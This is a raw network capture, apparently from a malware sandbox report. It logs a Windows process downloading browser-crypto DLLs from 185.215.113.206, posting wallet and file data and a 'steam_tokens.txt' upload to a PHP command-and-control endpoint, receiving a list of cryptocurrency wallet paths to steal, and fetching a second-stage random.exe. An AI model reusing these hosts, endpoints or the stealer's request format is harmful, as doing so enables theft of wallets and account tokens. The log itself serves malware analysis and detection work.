[TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Nov 22, 2024 20:35:26.392324924 CET	91	OUT	GET /68b591d6548ec281/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 22, 2024 20:35:26.837548971 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:26 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Nov 22, 2024 20:35:29.991102934 CET	95	OUT	GET /68b591d6548ec281/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 22, 2024 20:35:30.436065912 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:30 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Nov 22, 2024 20:35:31.067506075 CET	99	OUT	GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 22, 2024 20:35:31.512872934 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:31 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Nov 22, 2024 20:35:31.786588907 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAAFCAKKKFBFIDGDBFH Host: 185.215.113.206 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Nov 22, 2024 20:35:32.908785105 CET	202	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 22, 2024 20:35:33.131463051 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHJEGIIEGIDGIDHJDAKF Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 45 47 49 49 45 47 49 44 47 49 44 48 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 45 47 49 49 45 47 49 44 47 49 44 48 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 45 47 49 49 45 47 49 44 47 49 44 48 4a 44 41 4b 46 2d 2d 0d 0a Data Ascii: ------FHJEGIIEGIDGIDHJDAKFContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------FHJEGIIEGIDGIDHJDAKFContent-Disposition: form-data; name="message"wallets------FHJEGIIEGIDGIDHJDAKF--
Nov 22, 2024 20:35:33.579163074 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:33 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Nov 22, 2024 20:35:33.773037910 CET	467	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECBAFCAAKJDHJKFIEBG Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 2d 2d 0d 0a Data Ascii: ------IECBAFCAAKJDHJKFIEBGContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------IECBAFCAAKJDHJKFIEBGContent-Disposition: form-data; name="message"files------IECBAFCAAKJDHJKFIEBG--
Nov 22, 2024 20:35:34.222141981 CET	202	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 22, 2024 20:35:34.241607904 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHI Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="file"------BAKFCBFHJDHJKECAKEHI--
Nov 22, 2024 20:35:35.182131052 CET	202	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 22, 2024 20:35:35.208726883 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKKKEHDHCBFIEBFBGID Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 2d 2d 0d 0a Data Ascii: ------DBKKKEHDHCBFIEBFBGIDContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------DBKKKEHDHCBFIEBFBGIDContent-Disposition: form-data; name="message"ybncbhylepme------DBKKKEHDHCBFIEBFBGID--
Nov 22, 2024 20:35:35.678697109 CET	271	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 68 Keep-Alive: timeout=5, max=86 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=
Nov 22, 2024 20:35:40.482580900 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAEBAKKJKKEBKFIDBFBA Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 2d 2d 0d 0a Data Ascii: ------AAEBAKKJKKEBKFIDBFBAContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------AAEBAKKJKKEBKFIDBFBAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------AAEBAKKJKKEBKFIDBFBA--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49759	185.215.113.16	80	7540	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:35:35.803210020 CET	80	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Nov 22, 2024 20:35:37.139341116 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Nov 2024 19:35:36 GMT Content-Type: application/octet-stream Content-Length: 1881600 Last-Modified: Fri, 22 Nov 2024 19:33:15 GMT Connection: keep-alive ETag: "6740dc7b-1cb600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVfJ@K@WkHJJ @.rsrcH@.idata @ p*@brwftgiw 1@oajgfsxlJ@.taggant0J"@
Nov 22, 2024 20:35:37.139389038 CET	124	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:35:37.139400005 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:35:37.139414072 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:35:37.139431000 CET	248	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:35:37.139758110 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:35:37.139803886 CET	1236	IN	Data Raw: 75 ca 8c c4 74 f4 99 26 0a 67 a9 5f 75 f3 56 83 23 07 a9 db 45 76 8d c7 86 45 ec 34 c8 0b 4f 0a 46 f7 9a e6 6f 7b cb 2b 44 03 af e5 e3 a3 49 9b 32 75 98 2b 2c 13 b4 c3 43 b7 94 6d f4 07 71 a6 d1 67 da 2f 6c 87 af e1 a3 a3 a9 5b 74 f6 c7 55 bc 37 Data Ascii: ut&g_uV#EvE4OFo{+DI2u+,Cmqg/l[tU7s;pDcEs?A7DkKC40.D[W<U#Ko,/7TJ578/h5JKl+T0UMK(v*ldscEW},Dxcxe@
Nov 22, 2024 20:35:37.139815092 CET	248	IN	Data Raw: 57 5b 3a a7 38 ef b5 f7 3a df 03 b4 2f 2a dc ab 24 21 46 47 79 d7 46 3b 9a 9a 5d ac d0 11 9e 51 cc 64 07 fb aa 28 2d e7 21 79 6f 16 c0 3f 3a b6 79 c0 49 db e0 d0 8e 68 88 61 6f 3b 6a be 90 22 a4 3f 73 76 24 05 13 38 35 58 42 8c b2 17 f5 68 a5 dc Data Ascii: W[:8:/$!FGyF;]Qd(-!yo?:yIhao;j"?sv$85XBh,{]r%,w#`cG' 8/\|L%q"!FGB5Z7H-pw\|[D,\|bAS5/l;#((yEOcF7
Nov 22, 2024 20:35:37.141930103 CET	1236	IN	Data Raw: a7 36 93 e5 29 6f 31 a7 a7 25 ab 0f c0 bc 73 1f 79 5b e3 97 7f a6 34 5b e6 b7 2c a4 6c 46 2a 70 a9 cc 20 f2 17 37 74 c2 92 2f b4 68 6d 3f 02 aa 85 12 04 e1 84 23 71 88 8a 10 b2 ec a6 02 eb 1f 7c 65 98 7c 40 a7 df 82 fd a1 af 36 ce f7 0b 4f 75 eb Data Ascii: 6)o1%sy[4[,lFp 7t/hm?#q\|e\|@6OuKj4n5KGoofQZ/2e09@-t!j9$$V?bfs!=V=n013AX6yv;%:\|\TKZf`*$
Nov 22, 2024 20:35:37.142030001 CET	1236	IN	Data Raw: b2 da 1c 32 5e 87 39 1b b1 a9 5c 84 9a 60 2a 26 d4 93 b9 e6 20 33 ad 6f 0b 45 c4 cf 66 89 cc e7 c2 c7 ad 93 e5 2f d8 01 cb 15 ae a0 05 d4 78 7b d8 6c b4 89 fb 20 5c 6e 14 da 10 f3 ab 4f f8 1e 6d 11 9a 18 9c 63 ba 7b 63 cf e1 42 f5 b1 d7 f9 dd d8 Data Ascii: 2^9\`*& 3oEf/x{l \nOmc{cB#Vf3O;$xP~7Nz+HbZY,:i[z#\|pEo&:g1@bkv%1x-8BG:b:`q5:Hk33n6o0
